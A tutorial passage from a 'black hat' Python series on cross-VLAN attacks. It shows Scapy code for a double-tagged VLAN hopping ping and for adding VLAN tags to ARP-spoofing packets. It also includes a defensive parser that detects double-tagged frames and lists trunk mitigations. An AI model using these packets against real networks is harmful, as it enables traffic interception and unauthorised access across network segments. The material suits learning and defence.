A VLAN (Virtual Local Area Network), built on top of Ethernet, can divide one physical network into multiple VLANs, or cross physical network boundaries and place hosts from different subnets into the same VLAN. Figure 2 is an example of a VLAN partition.
Figure 2
There are many ways to implement VLANs; based on the switching device, VLAN partitioning generally falls into two types:
- Port-based partitioning on the switch
- An extended Ethernet frame format based on the IEEE 802.1Q protocol
The second type of VLAN technology introduces the concept of trunking: a trunk link connects different switches so that members of the same VLAN spread across multiple switches can communicate with each other. The ports on which the switches are interconnected are called trunk ports. Besides 802.1Q, Cisco has its own trunk protocol called ISL.
Figure 3
Figure 3 shows an 802.1Q frame. There is no essential difference from a normal Ethernet frame; it just adds a VLAN tag. The VLAN identifier (the red part) identifies which VLAN a frame belongs to, ensuring that broadcast traffic does not cross the VLAN.
Now a simple thought: to communicate across VLANs, is it enough to just modify the identifier in the packet?
3.4.1 VLAN Hopping
Based on the above analysis, we consider a simple scenario: a cross-VLAN ping, sending a ping request from a host in VLAN 1 to a host in VLAN 2.
Before writing the code, we have to solve the problem of constructing VLAN packets. In Scapy we use the Dot1Q class to construct the tag part of Figure 3, as shown in Figure 4.
Figure 4
Below, we write a ping request that crosses VLANs.
#!/usr/bin/python
from scapy.all import *

# ICMP echo request carrying two 802.1Q tags: the outer tag is the sender's
# VLAN (1), the inner tag is the destination's VLAN (2).
packet = Ether(dst="c0:d3:de:ad:be:ef") / \
         Dot1Q(vlan=1) / \
         Dot1Q(vlan=2) / \
         IP(dst="192.168.13.3") / \
         ICMP()
sendp(packet)
The code above specifies the target host's MAC and IP address and adds two VLAN tags: the first is the VLAN of the host sending the data, the second is the VLAN where the destination host resides. The switch strips the first tag, and when it reads the second tag it forwards the packet to the target host.
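As an added, defender-side example that is not part of the original post: the parser below walks the 802.1Q tag layout described for Figure 3 (TPID 0x8100 followed by a 16-bit TCI holding PCP, DEI and the 12-bit VID) and classifies frames as untagged, single-tagged or double-tagged, so that frames like the one produced by the snippet above can be recognised. The TPID/TCI layout comes from the 802.1Q standard; the function names, the source MAC address and the sample frames are assumptions made for this example (only the destination MAC is taken from the post).

```python
# Added example (not code from the original post): a small 802.1Q tag parser
# and a check that flags double-tagged frames, the pattern the VLAN hopping
# technique above depends on. Sample frames below are constructed for the demo.
import struct

TPID_8021Q = 0x8100   # customer VLAN tag (802.1Q)
TPID_8021AD = 0x88A8  # service VLAN tag (802.1ad, "QinQ"); parsed the same way


def parse_vlan_tags(frame):
    """Return (dst_mac, src_mac, tags, ethertype, payload) for a raw frame.

    tags is a list of (pcp, dei, vid) tuples, one per 802.1Q/802.1ad tag found
    directly after the MAC addresses. The TCI field is 16 bits:
    3 bits priority (PCP), 1 bit drop eligible (DEI), 12 bits VLAN ID (VID).
    """
    if len(frame) < 14:
        raise ValueError("frame shorter than a minimal Ethernet header")
    dst = frame[0:6].hex(":")
    src = frame[6:12].hex(":")
    offset = 12
    tags = []
    while True:
        if offset + 2 > len(frame):
            raise ValueError("truncated frame: missing EtherType")
        (ethertype,) = struct.unpack_from("!H", frame, offset)
        offset += 2
        if ethertype not in (TPID_8021Q, TPID_8021AD):
            break  # reached the real EtherType (0x0800 IPv4, 0x0806 ARP, ...)
        if offset + 2 > len(frame):
            raise ValueError("truncated frame: missing TCI after TPID")
        (tci,) = struct.unpack_from("!H", frame, offset)
        offset += 2
        tags.append((tci >> 13, (tci >> 12) & 1, tci & 0x0FFF))
    return dst, src, tags, ethertype, frame[offset:]


def inspect_frame(frame):
    """Classify a frame as untagged, single-tagged or double-tagged.

    Two or more VLAN tags on a frame received from an end host is the
    signature a detector looks for: one tag is normal on a trunk, two is not
    something an access-port host should be sending.
    """
    dst, src, tags, ethertype, _ = parse_vlan_tags(frame)
    if not tags:
        verdict = "untagged"
    elif len(tags) == 1:
        verdict = "single-tagged"
    else:
        verdict = "double-tagged"
    return {
        "src": src,
        "dst": dst,
        "vids": [vid for _, _, vid in tags],
        "ethertype": ethertype,
        "verdict": verdict,
    }


def build_sample_frame(dst, src, vids, ethertype, payload):
    """Construct a raw frame for testing (sample data only, not captured traffic)."""
    frame = bytes.fromhex(dst.replace(":", "")) + bytes.fromhex(src.replace(":", ""))
    for vid in vids:
        frame += struct.pack("!HH", TPID_8021Q, vid & 0x0FFF)  # PCP=0, DEI=0
    return frame + struct.pack("!H", ethertype) + payload


if __name__ == "__main__":
    # Constructed sample: the double-tagged frame from the Scapy snippet above
    # (destination MAC from the post, source MAC made up for the example).
    sample = build_sample_frame("c0:d3:de:ad:be:ef", "02:00:00:00:00:01",
                                [1, 2], 0x0800, b"\x00" * 28)
    print(inspect_frame(sample))
```

The parser works on the raw bytes of a frame as a capture tool would hand them over, so it can be run over a pcap without depending on how a switch rewrote the tags. Double tagging only gets a frame across the VLAN boundary when the outer tag matches the native VLAN of the trunk the frame crosses, which is why the usual mitigations are to set the native VLAN of trunk ports to an otherwise unused VLAN ID, tag the native VLAN explicitly, keep access ports out of that VLAN, and disable automatic trunk negotiation on ports facing end hosts.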
3.4.2 ARP spoofing across VLANs
Sections 3.1, 3.2 and 3.3 all dealt with ARP spoofing. Because VLANs restrict broadcast domains, our earlier code cannot perform ARP spoofing across VLANs. This problem is easy to solve, though: simply insert the VLAN identifiers into the ARP spoofing packets we constructed earlier. The following is the code that constructs the ARP request packet in section 3.1.
import sys
from scapy.all import *

# options, args and mac are defined by the section 3.1 script that this
# function belongs to (command-line options, positional arguments, our MAC).
def build_req():
    if options.target is None:
        # No target given: broadcast the request
        pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / \
              ARP(hwsrc=mac, psrc=args[0], pdst=args[0])
    elif options.target:
        target_mac = getmacbyip(options.target)
        if target_mac is None:
            print("[-] Error: could not resolve target's MAC address")
            sys.exit(1)
        pkt = Ether(src=mac, dst=target_mac) / \
              ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)
    return pkt
In the section that constructs the packet, we insert the VLAN identity:
pkt = Ether(src=mac, dst=target_mac) / \
      Dot1Q(vlan=our_vlan) / \
      Dot1Q(vlan=target_vlan) / \
      ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)
This makes it possible to perform ARP spoofing across VLANs.
3.4.3 Summary
This section focused on constructing VLAN-tagged packets to achieve cross-VLAN communication and ARP spoofing. Note that the method in this article targets the 802.1Q protocol and has no effect on VLANs that are isolated by port-based partitioning.
The above is the editor's detailed introduction to Python Black Hat Programming 3.4: Cross-VLAN. I hope it is of some help; if you have any questions, please leave me a message and I will reply promptly. Thank you very much for your support of topic.alibabacloud.com!